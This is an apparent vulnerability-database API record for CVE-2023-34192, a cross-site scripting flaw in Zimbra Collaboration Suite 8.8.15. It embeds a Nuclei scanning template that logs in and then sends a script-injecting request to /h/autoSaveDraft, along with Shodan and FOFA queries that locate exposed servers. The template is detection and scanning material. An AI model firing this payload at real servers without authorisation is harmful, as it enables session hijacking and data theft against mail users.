{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-34192/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-34192/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-34192/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-34192/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-34192/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-34192"},"sightings":{"href":"/api/v1/sightings/cve-2023-34192"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-34192.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2023-34192\n\ninfo:\n  name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting\n  author: ritikchaddha\n  severity: critical\n  description: |\n    Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n  remediation: |\n    Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS).\n  reference:\n    - https://mp.weixin.qq.com/s/Vz8yL4xBlZN5EQQ_BG0OOA\n    - https://www.helpnetsecurity.com/2023/07/17/cve-2023-34192/\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-34192\n    - https://wiki.zimbra.com/wiki/Security_Center\n    - https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\n    cvss-score: 9\n    cve-id: CVE-2023-34192\n    cwe-id: CWE-79\n    epss-score: 0.77266\n    epss-percentile: 0.99533\n    cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: zimbra\n    product: collaboration\n    shodan-query:\n      - http.favicon.hash:475145467\n      - http.favicon.hash:\"1624375939\"\n      - http.favicon.hash:\"475145467\"\n    fofa-query:\n      - icon_hash=\"475145467\"\n      - icon_hash=\"1624375939\"\n      - app=\"zimbra-邮件系统\"\n  tags: cve,cve2023,zimbra,xss,authenticated,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /zimbra/ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        loginOp=login&username={{username}}&password={{password}}&client=preferred\n      - |\n        GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body_2\n        words:\n          - \"<script>alert(document.domain)</script>\"\n          - \"zimbra\"\n        condition: and\n\n      - type: word\n        part: header_2\n        words:\n          - text/html\n\n      - type: status\n        part: header_2\n        status:\n          - 200\n# digest: 4a0a00473045022100bde8b3e6c21ad196c78ceefcc9e2476c01501d72109ababd92ee75fd00978e37022041eb5d8e2258f910dc36418a42848109307231f517945fb073f15f8aa683e294:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-34192"}